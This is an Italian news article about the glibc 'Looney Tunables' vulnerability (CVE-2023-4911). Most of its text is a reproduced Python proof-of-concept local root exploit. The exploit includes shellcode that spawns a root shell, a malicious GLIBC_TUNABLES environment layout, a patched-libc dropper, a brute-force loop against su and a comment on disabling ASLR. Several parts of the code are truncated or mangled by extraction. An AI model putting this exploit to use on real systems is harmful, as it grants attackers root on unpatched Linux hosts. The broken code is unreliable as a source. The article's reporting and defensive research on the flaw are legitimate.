Redazione RHC : 6 Ottobre 2023 16:22
Prima che avessimo il tempo di parlarvi della vulnerabilità “Looney Tunables”, tracciata con l’identificatore CVE-2023-4911, su Internet era già apparso un exploit PoC che consente di sfruttare con successo questa vulnerabilità in un attacco reale.
Inoltre, la complessità dello sfruttamento della vulnerabilità è a un livello estremamente basso: anche un hacker alle prime armi può farcela. Il codice lo trovate più avanti.
Looney Tunables consente agli aggressori di ottenere privilegi di root sui sistemi Linux sfruttando un difetto di buffer overflow. La falla di sicurezza colpisce le installazioni standard di Debian 12 e 13, Ubuntu 22.04 e 23.04 e Fedora 37 e 38.
Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?
Stiamo per avviare il corso intermedio in modalità "Live Class", previsto per febbraio.
A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente.
Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato.
Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile.
Non perdere i nostri corsi e scrivi subito su WhatsApp al numero
379 163 8765
per richiedere informazioni
"
Supporta RHC attraverso:
Ti piacciono gli articoli di Red Hot Cyber? Non aspettare oltre, iscriviti alla newsletter settimanale per non perdere nessun articolo.
I criminali informatici possono sfruttare la vulnerabilità utilizzando una variabile di ambiente dannosa “GLIBC_TUNABLES” gestita dal loader dinamico “ld.so” per causare l’esecuzione di codice arbitrario come root quando si eseguono file binari con autorizzazione SUID.
Uno degli exploit PoC, già confermato e funzionante dall’esperto di vulnerabilità Will Dohrmann, è stato pubblicato dal ricercatore indipendente sulla sicurezza Peter Geissler con lo pseudonimo di “blasty”.
#
# gnu-acme.py
# ------------------------------------------------------------------------------
# my (bad) attempt at a CVE-2023-4911 exploit
# based on the advisory[1] by Qualys and thumb sucking
#
# if you disable aslr (echo 0 > /proc/sys/kernel/randomize_va_space) it will
# attempt to identify a workable offset for your ld.so, you can add it to TARGETS
#
# tested on glibc 2.35-0ubuntu3 (aarch64) and glibc 2.36-9+deb12u2 (amd64)
#
# enjoy, maybe? and don't ask for support :)
#
# -- blasty
#
# [1]: https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
#
import binascii
import resource
import struct
import select
import time
import sys
import os
from ctypes import *
from ctypes.util import find_library
from shutil import which
unhex = lambda v: binascii.unhexlify(v.replace(" ", ""))
# setresuid(euid, euid, euid); execve("/bin/sh", ["sh", NULL], NULL);
# exit(0x66)
ARCH = {
"x86_64": {
"shellcode": unhex(
"6a6b580f0589c789c289c66a75580f05"
+ "6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05"
),
"exitcode": unhex("6a665f6a3c580f05"),
"stack_top": 0x800000000000,
"stack_aslr_bits": 34,
},
"aarch64": {
"shellcode": unhex(
"e81580d2010000d4e10300aae20300aa681280d2010000d4"
+ "ee458cd22ecdadf2eee5c5f2ee65eef20f0d80d2ee3fbfa9e0030091e1031faae2031faaa81b80d2010000d4"
),
"exitcode": unhex("c00c80d2a80b80d2010000d4"),
"stack_top": 0x1000000000000,
"stack_aslr_bits": 30,
},
}
TARGETS = {
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
"a99db3715218b641780b04323e4ae5953d68a927": 561,
}
libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
resource.setrlimit(
resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY)
)
def error(s):
print("error: %s" % s)
exit(-1)
def find_hax_path(blob, offset):
pos = offset
while pos > 0:
if blob[pos] != 0 and blob[pos] != 0x2F and blob[pos + 1] == 0:
return {"path": bytes([blob[pos]]), "offset": pos - offset}
pos = pos - 1
return None
def lolstruct(format, keys, data):
return dict(zip(keys.split(" "), struct.unpack(format, data)))
def lib_path(libname):
class LINKMAP(Structure):
_fields_ = [("l_addr", c_void_p), ("l_name", c_char_p)]
lib = CDLL(find_library("c"))
libdl = CDLL(find_library("dl"))
dlinfo = libdl.dlinfo
dlinfo.argtypes = c_void_p, c_int, c_void_p
dlinfo.restype = c_int
lmptr = c_void_p()
dlinfo(lib._handle, 2, byref(lmptr))
return cast(lmptr, POINTER(LINKMAP)).contents.l_name
def execve(filename, cargv, cenvp):
libc.execve(filename, cargv, cenvp)
def spawn(filename, argv, envp):
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(envp))(*envp)
child_pid = os.fork()
# child
if not child_pid:
execve(filename, cargv, cenvp)
exit(0)
# parent
start_time = time.time()
while True:
try:
pid, status = os.waitpid(child_pid, os.WNOHANG)
if pid == child_pid:
if os.WIFEXITED(status):
return os.WEXITSTATUS(status) & 0xFF7F
else:
return 0
except:
pass
current_time = time.time()
if current_time - start_time >= 1.5:
print("** ohh... looks like we got a shell? **\n")
os.waitpid(child_pid, 0)
return 0x1337
class lazy_elf:
def __init__(self, filename):
self.d = open(filename, "rb").read()
self.h = lolstruct(
" 0
def build_env(adjust, addr, offset):
# heap meh shui
env = [
b"GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=" + b"P" * adjust,
b"GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=" + b"X" * 8,
b"GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=" + b"X" * 7,
b"GLIBC_TUNABLES=glibc.mem.tagging=" + b"Y" * 24,
]
for j in range(172):
env.append(b"")
env.append(struct.pack(" -- ")
print("")
if __name__ == "__main__":
banner()
machine = os.uname().machine
if machine not in ARCH.keys():
error("architecture '%s' not supported" % machine)
print("[i] libc = %s" % lib_path("c").decode())
su_path = which("su")
print("[i] su = %s" % su_path)
suid_e = lazy_elf(su_path)
ld_path = suid_e.section_by_name(".interp").strip(b"\x00").decode()
ld_e = lazy_elf(ld_path)
print("[i] ld.so = %s" % ld_path)
ld_build_id = binascii.hexlify(
ld_e.section_by_name(".note.gnu.build-id")[-20:]
).decode()
print("[i] ld.so build id = %s" % ld_build_id)
libc_e = lazy_elf(lib_path("c"))
__libc_start_main = libc_e.symbol("__libc_start_main")
print("[i] __libc_start_main = 0x%x" % __libc_start_main)
offset = suid_e.shdr_by_name(".dynstr")["offset"]
hax_path = find_hax_path(suid_e.d, offset)
if hax_path is None:
error("could not find hax path")
print(
"[i] using hax path %s at offset %d"
% (
hax_path["path"],
hax_path["offset"],
)
)
if ld_build_id not in TARGETS.keys():
error("no target info found for build id %s" % ld_build_id)
if not os.path.exists(hax_path["path"]):
os.mkdir(hax_path["path"])
argv = build_argv([su_path, "--help"])
if not is_aslr_enabled():
print("[i] ASLR is not enabled, attempting to find usable offsets")
shellcode = ARCH[machine]["exitcode"]
with open(hax_path["path"] + b"/libc.so.6", "wb") as fh:
fh.write(libc_e.d[0:__libc_start_main])
fh.write(shellcode)
fh.write(libc_e.d[__libc_start_main + len(shellcode) :])
print("[i] wrote patched libc.so.6")
stack_addr = ARCH[machine]["stack_top"] - 0x2000
stack_addr += 0x103
print("[i] using stack addr 0x%x" % stack_addr)
for adjust in range(128, 1024):
env = build_env(adjust, stack_addr, hax_path["offset"])
r = spawn(su_path.encode(), argv, env)
print("%d = %d" % (adjust, r))
if r == 0x66:
print(
"found working offset for ld.so '%s' -> %d" % (ld_build_id, adjust)
)
else:
shellcode = ARCH[machine]["shellcode"]
with open(hax_path["path"] + b"/libc.so.6", "wb") as fh:
fh.write(libc_e.d[0:__libc_start_main])
fh.write(shellcode)
fh.write(libc_e.d[__libc_start_main + len(shellcode) :])
print("[i] wrote patched libc.so.6")
stack_addr = ARCH[machine]["stack_top"] - (
1 > (i * 8)) & 0xFF == 0:
stack_addr |= 0x10
Anche altri ricercatori stanno sviluppando e pubblicando contemporaneamente i propri exploit per CVE-2023-4911 su GitHub e altre piattaforme.
“Il nostro riuscito sfruttamento che ha portato all’accesso root completo sulle principali distribuzioni come Fedora, Ubuntu e Debian sottolinea la gravità e la natura diffusa di questa vulnerabilità”, ha affermato Saeed Abbasi, product manager del team di ricerca sulle minacce di Qualys, il 3 ottobre.
Sono stati gli esperti di Qualys i primi a identificare questa vulnerabilità.
Gli amministratori devono agire immediatamente e proteggere le installazioni Linux sotto il loro controllo il prima possibile a causa della significativa minaccia rappresentata da Looney Tunables.
Copyright @ 2003 – 2024 RED HOT CYBER
PIVA 16821691009